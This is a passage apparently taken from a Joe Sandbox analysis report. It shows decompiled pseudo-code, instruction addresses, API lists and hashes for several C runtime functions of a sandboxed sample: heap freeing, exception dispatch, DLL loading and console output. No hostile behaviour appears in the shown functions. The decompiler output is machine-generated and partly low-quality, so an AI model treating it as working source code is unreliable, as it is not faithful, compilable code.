										 *((intOrPtr*)(_t250 + 0x28 + (_t213 + _t213) * 8)) = _t234;
									} else {
										 *((intOrPtr*)(_v712 + _t250)) = _t233;
										E01355C8F( *(_t250 + 0xa0 + _t213 * 4));
										 *(_t250 + 0xa0 + _t213 * 4) = _v740;
										E01355C8F(_v724);
										 *(_t250 + 8) = _v744;
										goto L40;
									}
									goto L41;
								}
							}
						} else {
							L41:
							_pop(_t254);
							return E0132EA79(_v8 ^ _t265, _t254);
						}
						goto L52;
					}
					asm("sbb eax, eax");
					_t167 = _t166 | 0x00000001;
					__eflags = _t167;
					goto L9;
				}
				L52:
			}

0x01354885
0x0135488d
0x01354894
0x01354897
0x01354898
0x0135489b
0x0135489f
0x013548a0
0x013548a3
0x013548b3
0x013548d6
0x013548db
0x013548e0
0x01354b96
0x01354b96
0x00000000
0x013548e6
0x013548e6
0x013548e9
0x013548ec
0x013548f2
0x013548fb
0x013548fd
0x01354900
0x0135490a
0x01354910
0x00000000
0x00000000
0x01354916
0x0135493f
0x0135493f
0x01354918
0x01354918
0x01354920
0x01354927
0x0135492d
0x00000000
0x0135492f
0x0135492f
0x01354932
0x0135493d
0x00000000
0x00000000
0x00000000
0x00000000
0x0135493d
0x0135492d
0x0135494c
0x0135494e
0x01354957
0x0135495d
0x01354960
0x01354960
0x01354963
0x01354966
0x01354966
0x01354976
0x01354984
0x01354989
0x01354990
0x01354992
0x00000000
0x01354998
0x0135499e
0x013549ab
0x013549b4
0x013549ba
0x013549c7
0x013549ce
0x013549d3
0x013549d6
0x013549d8
0x01354c16
0x01354c1c
0x01354c1d
0x01354c1e
0x01354c1f
0x01354c20
0x01354c21
0x01354c26
0x01354c29
0x01354c2c
0x01354c2d
0x01354c3f
0x01354c44
0x01354c46
0x01354c4f
0x01354c4f
0x01354c48
0x01354c48
0x01354c4b
0x01354c4d
0x00000000
0x00000000
0x01354c4d
0x01354c55
0x013549de
0x013549de
0x013549ec
0x013549ef
0x01354a05
0x01354a0c
0x01354a11
0x013549f1
0x013549f1
0x013549f9
0x00000000
0x013549fb
0x013549fb
0x01354a01
0x01354a01
0x013549f9
0x01354a18
0x01354a1f
0x01354a22
0x01354b20
0x01354b23
0x01354b30
0x01354b33
0x01354b3b
0x01354b3b
0x01354b25
0x01354b2b
0x01354b2b
0x01354a28
0x01354a28
0x01354a34
0x01354a3a
0x01354a40
0x01354a43
0x01354a49
0x01354a4c
0x01354a4f
0x00000000
0x00000000
0x01354a51
0x01354a5a
0x01354a5e
0x01354a67
0x01354a6b
0x01354a6c
0x01354a72
0x01354a78
0x01354a7e
0x01354a81
0x00000000
0x00000000
0x01354a83
0x01354aa2
0x01354aa2
0x01354aa5
0x01354ac2
0x01354ac7
0x01354aca
0x01354acc
0x01354b0a
0x01354ace
0x01354ace
0x01354ad4
0x01354ad9
0x01354ae1
0x01354ae2
0x01354ae2
0x01354af9
0x01354b00
0x01354b03
0x01354b05
0x01354b05
0x01354b10
0x01354b16
0x01354b16
0x01354b1b
0x00000000
0x01354b1b
0x01354a85
0x01354a87
0x01354a8c
0x01354a92
0x01354a9b
0x01354a9e
0x01354a9e
0x00000000
0x01354a87
0x01354b3e
0x01354b3e
0x01354b42
0x01354b4a
0x01354b50
0x01354b53
0x01354b59
0x01354b5b
0x01354ba7
0x01354bad
0x01354bb4
0x01354bb4
0x01354bba
0x01354bbe
0x00000000
0x01354bc0
0x01354bc4
0x01354bcd
0x01354bd9
0x01354be7
0x01354bed
0x01354bf0
0x01354bf0
0x01354bbe
0x01354bff
0x01354c07
0x01354c10
0x01354b5d
0x01354b63
0x01354b6d
0x01354b7f
0x01354b86
0x01354b93
0x00000000
0x01354b93
0x00000000
0x01354b5b
0x013549d8
0x01354950
0x01354b98
0x01354b9c
0x01354ba6
0x01354ba6
0x00000000
0x0135494e
0x01354947
0x01354949
0x01354949
0x00000000
0x01354949
0x00000000

APIs

Part of subcall function 013559E0: GetLastError.KERNEL32(?,?,?,01349740,013A18F0,0000000C), ref: 013559E5
Part of subcall function 013559E0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01349740,013A18F0,0000000C), ref: 01355A83

_free.LIBCMT ref: 01354B6D
_free.LIBCMT ref: 01354B86
_free.LIBCMT ref: 01354BC4
_free.LIBCMT ref: 01354BCD
_free.LIBCMT ref: 01354BD9

Strings

C, xrefs: 013549DE

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 64f1e31e09e2cb5cc8f12b63e41ef0405bb8ebb8611086ef44e096412ca59440
Instruction ID: a01bdc90e248ce4a85a2a058d3a275f11bdfa9674082294292d05bea86edf085
Opcode Fuzzy Hash: 64f1e31e09e2cb5cc8f12b63e41ef0405bb8ebb8611086ef44e096412ca59440
Instruction Fuzzy Hash: 5BB15C75A0121A9FDB68DF18C884FA9B7B5FF48718F5045AAD94AA7350E730AED0CF40

Uniqueness

Uniqueness Score: -1.00%

Function 01345BB0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E01345BB0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr* _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				signed int _t78;
				char _t80;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr* _t97;
				void* _t101;
				void* _t103;
				void* _t110;

				_t72 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t72 = E0136542E(__ecx,  *_t72);
				_t73 = _a8;
				_t6 = _t73 + 0x10; // 0x11
				_t95 = _t6;
				_push(_t95);
				_v20 = _t95;
				_v12 =  *(_t73 + 8) ^  *0x13a4018;
				E01345B70(__edi, _t95,  *(_t73 + 8) ^  *0x13a4018);
				E01348F3C(_a12);
				_t52 = _a4;
				_t103 = _t101 - 0x1c + 0x10;
				_t92 =  *((intOrPtr*)(_t73 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t92 - 0xfffffffe;
					if(_t92 != 0xfffffffe) {
						E013490EC(_t73, 0xfffffffe, _t95, 0x13a4018);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t73 - 4)) =  &_v32;
					if(_t92 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t78 = _v12;
							_t59 = _t92 + (_t92 + 2) * 2;
							_t75 =  *((intOrPtr*)(_t78 + _t59 * 4));
							_t60 = _t78 + _t59 * 4;
							_t79 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t80 = _v5;
								goto L7;
							} else {
								_t61 = E0134909C(_t79, _t95);
								_t80 = 1;
								_v5 = 1;
								_t110 = _t61;
								if(_t110 < 0) {
									_v16 = 0;
									L13:
									_push(_t95);
									E01345B70(_t92, _t95, _v12);
									goto L14;
								} else {
									if(_t110 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0x1379c98;
											if(__eflags != 0) {
												_t68 = E01364EA0(__eflags, 0x1379c98);
												_t103 = _t103 + 4;
												__eflags = _t68;
												if(_t68 != 0) {
													_t97 =  *0x1379c98; // 0x13459a8
													 *0x1374358(_a4, 1);
													 *_t97();
													_t95 = _v20;
													_t103 = _t103 + 8;
												}
												_t62 = _a4;
											}
										}
										E013490D0(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t92;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t92) {
											E013490EC(_t64, _t92, _t95, 0x13a4018);
											_t64 = _a8;
										}
										_push(_t95);
										 *((intOrPtr*)(_t64 + 0xc)) = _t75;
										E01345B70(_t92, _t95, _v12);
										E013490B4();
										asm("int3");
										_t66 =  *0x13aaf7c; // 0x0
										return _t66;
									} else {
										goto L7;
									}
								}
							}
							goto L23;
							L7:
							_t92 = _t75;
						} while (_t75 != 0xfffffffe);
						if(_t80 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L23:
			}

0x01345bb7
0x01345bbb
0x01345bbc
0x01345bc2
0x01345bce
0x01345bd0
0x01345bd6
0x01345bd6
0x01345bdf
0x01345be1
0x01345be4
0x01345be7
0x01345bef
0x01345bf4
0x01345bf7
0x01345bfa
0x01345c01
0x01345c5d
0x01345c60
0x01345c6f
0x00000000
0x01345c6f
0x00000000
0x01345c03
0x01345c03
0x01345c09
0x01345c0f
0x01345c15
0x01345c80
0x01345c89
0x01345c17
0x01345c17
0x01345c17
0x01345c1d
0x01345c20
0x01345c23
0x01345c26
0x01345c29
0x01345c2e
0x01345c44
0x00000000
0x01345c30
0x01345c32
0x01345c37
0x01345c39
0x01345c3c
0x01345c3e
0x01345c54
0x01345c74
0x01345c74
0x01345c78
0x00000000
0x01345c40
0x01345c40
0x01345c8a
0x01345c8d
0x01345c93
0x01345c95
0x01345c9c
0x01345ca3
0x01345ca8
0x01345cab
0x01345cad
0x01345caf
0x01345cbc
0x01345cc2
0x01345cc4
0x01345cc7
0x01345cc7
0x01345cca
0x01345cca
0x01345c9c
0x01345cd2
0x01345cd7
0x01345cda
0x01345cdd
0x01345ce9
0x01345cee
0x01345cee
0x01345cf1
0x01345cf5
0x01345cf8
0x01345d08
0x01345d0d
0x01345d0e
0x01345d13
0x01345c42
0x00000000
0x01345c42
0x01345c40
0x01345c3e
0x00000000
0x01345c47
0x01345c47
0x01345c49
0x01345c50
0x00000000
0x01345c52
0x00000000
0x01345c50
0x01345c15
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 01345BE7
___except_validate_context_record.LIBVCRUNTIME ref: 01345BEF
_ValidateLocalCookies.LIBCMT ref: 01345C78
__IsNonwritableInCurrentImage.LIBCMT ref: 01345CA3
_ValidateLocalCookies.LIBCMT ref: 01345CF8

Strings

csm, xrefs: 01345C8D

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 19398d06db0ed54fcc1ff5c98093c919310370cc47f65e098d64d3a3ac69d2fc
Instruction ID: f07b5992215e2905251d64a2b07a0211042a58221f4a8f2f45548b2d10254e92
Opcode Fuzzy Hash: 19398d06db0ed54fcc1ff5c98093c919310370cc47f65e098d64d3a3ac69d2fc
Instruction Fuzzy Hash: DF41AF34E00219ABCF20DF6CC880A9EBBF9AF4532CF148255E918AB351D731AA55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 01355E9F, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E01355E9F(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x13ab3c8 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x137c368 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E01355668(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E01355668(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x01355ea8
0x01355f52
0x01355eb0
0x01355eb2
0x01355eb9
0x01355ebb
0x01355ec1
0x01355ece
0x01355ee3
0x01355ee7
0x01355f39
0x01355f39
0x01355f3e
0x01355f42
0x01355f45
0x01355f45
0x01355f4b
0x01355f4d
0x01355f62
0x01355f5d
0x01355f61
0x01355f61
0x01355f4f
0x01355f4f
0x00000000
0x01355f4f
0x01355ee9
0x01355ef2
0x01355f29
0x01355f29
0x01355f2b
0x01355f2d
0x00000000
0x00000000
0x01355f35
0x00000000
0x01355f35
0x01355efc
0x01355f01
0x01355f06
0x00000000
0x00000000
0x01355f10
0x01355f15
0x01355f1a
0x00000000
0x00000000
0x01355f1f
0x01355f25
0x00000000
0x01355f25
0x01355ec6
0x00000000
0x00000000
0x00000000
0x01355ecc
0x01355f5b
0x00000000

Strings

api-ms-, xrefs: 01355EF6
ext-ms-, xrefs: 01355F0A

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: c35c7fd04a7ad938224373d46bcdcb6d1ce159ed0a18b6e1b71eb9f7f04ddcad
Instruction ID: 00724cc42c8916f83742d8b2b0397b0513e9154b5330b35b73a86559d541ab23
Opcode Fuzzy Hash: c35c7fd04a7ad938224373d46bcdcb6d1ce159ed0a18b6e1b71eb9f7f04ddcad
Instruction Fuzzy Hash: B921D671A06225EBDB724A6D9C84E6E7B5C9F05F68F150121FD0AB7281D730FD04C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 0135D4F6, Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0135D4F6(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E0135D242(_t45, 7);
					E0135D242(_t45 + 0x1c, 7);
					E0135D242(_t45 + 0x38, 0xc);
					E0135D242(_t45 + 0x68, 0xc);
					E0135D242(_t45 + 0x98, 2);
					E01355C8F( *((intOrPtr*)(_t45 + 0xa0)));
					E01355C8F( *((intOrPtr*)(_t45 + 0xa4)));
					E01355C8F( *((intOrPtr*)(_t45 + 0xa8)));
					E0135D242(_t45 + 0xb4, 7);
					E0135D242(_t45 + 0xd0, 7);
					E0135D242(_t45 + 0xec, 0xc);
					E0135D242(_t45 + 0x11c, 0xc);
					E0135D242(_t45 + 0x14c, 2);
					E01355C8F( *((intOrPtr*)(_t45 + 0x154)));
					E01355C8F( *((intOrPtr*)(_t45 + 0x158)));
					E01355C8F( *((intOrPtr*)(_t45 + 0x15c)));
					return E01355C8F( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x0135d4fc
0x0135d501
0x0135d50a
0x0135d515
0x0135d520
0x0135d52b
0x0135d539
0x0135d544
0x0135d54f
0x0135d55a
0x0135d568
0x0135d576
0x0135d587
0x0135d595
0x0135d5a3
0x0135d5ae
0x0135d5b9
0x0135d5c4
0x00000000
0x0135d5d4
0x0135d5d9

APIs

Part of subcall function 0135D242: _free.LIBCMT ref: 0135D267

_free.LIBCMT ref: 0135D544

Part of subcall function 01355C8F: HeapFree.KERNEL32(00000000,00000000,?,013535B4), ref: 01355CA5
Part of subcall function 01355C8F: GetLastError.KERNEL32(?,?,013535B4), ref: 01355CB7

_free.LIBCMT ref: 0135D54F
_free.LIBCMT ref: 0135D55A
_free.LIBCMT ref: 0135D5AE
_free.LIBCMT ref: 0135D5B9
_free.LIBCMT ref: 0135D5C4
_free.LIBCMT ref: 0135D5CF

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fc33f1fcddaa056387f76da6a3bebe0f877ee113259183eaaa33493f47ce9eac
Instruction ID: f12120cbdf166d7c1f856566719e1c0dd0fd5d7e4e78e1a3c91e9c6f94600fbd
Opcode Fuzzy Hash: fc33f1fcddaa056387f76da6a3bebe0f877ee113259183eaaa33493f47ce9eac
Instruction Fuzzy Hash: 2411BB31901B05AADBA0BBF9CC05FEB779CAF60B58F400D14AE9BA6095DB34F5008B50

Uniqueness

Uniqueness Score: -1.00%

Function 0135F41D, Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E0135F41D(void* __ebx, void* __edi, void* __eflags, void* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				long _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __esi;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				struct _OVERLAPPED* _t242;
				signed int _t245;
				intOrPtr _t248;
				signed int _t251;
				signed int _t252;
				signed int _t254;
				intOrPtr _t256;
				void* _t262;
				intOrPtr _t263;
				signed int _t264;
				signed int _t267;
				signed char _t268;
				intOrPtr _t271;
				signed int _t273;
				long _t274;
				signed int _t275;
				signed char* _t278;
				signed int _t282;
				signed int _t284;
				void* _t286;
				signed int _t289;
				signed int _t290;
				intOrPtr _t291;
				signed int _t292;
				struct _OVERLAPPED* _t294;
				struct _OVERLAPPED* _t296;
				signed int _t298;
				signed int _t300;
				void* _t301;
				void* _t303;

				_t298 = _t300;
				_t301 = _t300 - 0x8c;
				_t170 =  *0x13a4018; // 0x39cca9f6
				_v8 = _t170 ^ _t298;
				_t172 = _a8;
				_t267 = _t172 >> 6;
				_t245 = (_t172 & 0x0000003f) * 0x38;
				_t278 = _a12;
				_v108 = _t278;
				_v80 = _t267;
				_v112 =  *((intOrPtr*)(_t245 +  *((intOrPtr*)(0x13ab590 + _t267 * 4)) + 0x18));
				_v44 = _t245;
				_v96 = _a16 + _t278;
				_t178 = GetConsoleOutputCP();
				_t242 = 0;
				_v124 = _t178;
				E01349944( &_v72, _t267, 0);
				_t284 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t248 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t248;
				_v104 = _t278;
				if(_t278 >= _v96) {
					L49:
					__eflags = _v60 - _t242;
				} else {
					while(1) {
						_t251 = _v44;
						_v51 =  *_t278;
						_v76 = _t242;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x13ab590 + _v80 * 4));
						_v48 = _t186;
						if(_t248 != 0xfde9) {
							goto L20;
						}
						_t211 = _t242;
						_t271 = _v48 + 0x2e + _t251;
						_v116 = _t271;
						while( *((intOrPtr*)(_t271 + _t211)) != _t242) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t273 = _v96 - _t278;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t278 & 0x000000ff) + 0x13a49a0; // 0x0
							_t256 =  *_t72 + 1;
							_v48 = _t256;
							__eflags = _t256 - _t273;
							if(_t256 > _t273) {
								__eflags = _t273;
								if(_t273 <= 0) {
									goto L41;
								} else {
									_t290 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x13ab590 + _v80 * 4)) + _t290 + _t242 + 0x2e)) =  *((intOrPtr*)(_t242 + _t278));
										_t242 =  &(_t242->Internal);
										__eflags = _t242 - _t273;
									} while (_t242 < _t273);
									goto L40;
								}
							} else {
								_v144 = _t242;
								__eflags = _t256 - 4;
								_v140 = _t242;
								_v56 = _t278;
								_v40 = (_t256 == 4) + 1;
								_t220 = E013606FE( &_v144,  &_v76,  &_v56, (_t256 == 4) + 1,  &_v144);
								_t303 = _t301 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L49;
								} else {
									_t291 = _v48;
									goto L19;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t251 + _v48 + 0x2e) & 0x000000ff) + 0x13a49a0)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t273) {
								__eflags = _t273;
								if(_t273 > 0) {
									_t292 = _t251;
									do {
										_t227 =  *((intOrPtr*)(_t242 + _t278));
										_t262 =  *((intOrPtr*)(0x13ab590 + _v80 * 4)) + _t292 + _t242;
										_t242 =  &(_t242->Internal);
										 *((char*)(_t262 + _v40 + 0x2e)) = _t227;
										_t292 = _v44;
										__eflags = _t242 - _t273;
									} while (_t242 < _t273);
									L40:
									_t284 = _v88;
								}
								L41:
								_t289 = _t284 + _t273;
								__eflags = _t289;
								L42:
								__eflags = _v60;
								_v88 = _t289;
							} else {
								_t274 = _v40;
								_t294 = _t242;
								_t263 = _v116;
								do {
									 *((char*)(_t298 + _t294 - 0xc)) =  *((intOrPtr*)(_t263 + _t294));
									_t294 =  &(_t294->Internal);
								} while (_t294 < _t274);
								_t295 = _v48;
								_t264 = _v44;
								if(_v48 > 0) {
									E01345ED0( &_v16 + _t274, _t278, _t295);
									_t264 = _v44;
									_t301 = _t301 + 0xc;
									_t274 = _v40;
								}
								_t282 = _v80;
								_t296 = _t242;
								do {
									 *( *((intOrPtr*)(0x13ab590 + _t282 * 4)) + _t264 + _t296 + 0x2e) = _t242;
									_t296 =  &(_t296->Internal);
								} while (_t296 < _t274);
								_t278 = _v104;
								_t291 = _v48;
								_v120 =  &_v16;
								_v136 = _t242;
								_v132 = _t242;
								_v40 = (_v56 == 4) + 1;
								_t237 = E013606FE( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t303 = _t301 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L49;
								} else {
									L19:
									_t278 = _t278 - 1 + _t291;
									L28:
									_t278 =  &(_t278[1]);
									_v104 = _t278;
									_t193 = E013577B7(_v124, _t242,  &_v76, _v40,  &_v32, 5, _t242, _t242);
									_t301 = _t303 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L49;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t242) == 0) {
											L48:
											_v92 = GetLastError();
											goto L49;
										} else {
											_t284 = _v84 - _v108 + _t278;
											_v88 = _t284;
											if(_v100 < _v56) {
												goto L49;
											} else {
												if(_v51 != 0xa) {
													L35:
													if(_t278 >= _v96) {
														goto L49;
													} else {
														_t248 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t242) == 0) {
														goto L48;
													} else {
														if(_v100 < 1) {
															goto L49;
														} else {
															_v84 = _v84 + 1;
															_t284 = _t284 + 1;
															_v88 = _t284;
															goto L35;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L50;
						L20:
						_t268 =  *((intOrPtr*)(_t251 + _t186 + 0x2d));
						__eflags = _t268 & 0x00000004;
						if((_t268 & 0x00000004) == 0) {
							_v33 =  *_t278;
							_t188 = E0134BBB8(_t268);
							_t252 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t252 * 2)) - _t242;
							if( *((intOrPtr*)(_t188 + _t252 * 2)) >= _t242) {
								_push(1);
								_push(_t278);
								goto L27;
							} else {
								_t100 =  &(_t278[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t275 = _v80;
									_t254 = _v44;
									 *((char*)(_t254 +  *((intOrPtr*)(0x13ab590 + _t275 * 4)) + 0x2e)) = _v33;
									 *(_t254 +  *((intOrPtr*)(0x13ab590 + _t275 * 4)) + 0x2d) =  *(_t254 +  *((intOrPtr*)(0x13ab590 + _t275 * 4)) + 0x2d) | 0x00000004;
									_t289 = _t284 + 1;
									goto L42;
								} else {
									_t206 = E013594EB( &_v76, _t278, 2);
									_t303 = _t301 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L49;
									} else {
										_t278 = _v56;
										goto L28;
									}
								}
							}
						} else {
							_v24 =  *((intOrPtr*)(_t251 + _t186 + 0x2e));
							_v23 =  *_t278;
							_push(2);
							 *(_t251 + _v48 + 0x2d) = _t268 & 0x000000fb;
							_push( &_v24);
							L27:
							_push( &_v76);
							_t190 = E013594EB();
							_t303 = _t301 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L49;
							} else {
								goto L28;
							}
						}
						goto L50;
					}
				}
				L50:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t298;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_pop(_t286);
				return E0132EA79(_v8 ^ _t298, _t286);
			}

0x0135f420
0x0135f422
0x0135f428
0x0135f42f
0x0135f432
0x0135f43a
0x0135f43d
0x0135f44a
0x0135f44d
0x0135f450
0x0135f457
0x0135f45f
0x0135f462
0x0135f465
0x0135f46b
0x0135f46d
0x0135f474
0x0135f47e
0x0135f480
0x0135f483
0x0135f486
0x0135f489
0x0135f48c
0x0135f48f
0x0135f495
0x0135f7a0
0x0135f7a0
0x00000000
0x0135f49b
0x0135f4a3
0x0135f4a6
0x0135f4ac
0x0135f4af
0x0135f4b6
0x0135f4bd
0x0135f4c0
0x00000000
0x00000000
0x0135f4c9
0x0135f4ce
0x0135f4d0
0x0135f4d3
0x0135f4d8
0x0135f4dc
0x00000000
0x00000000
0x00000000
0x0135f4dc
0x0135f4e1
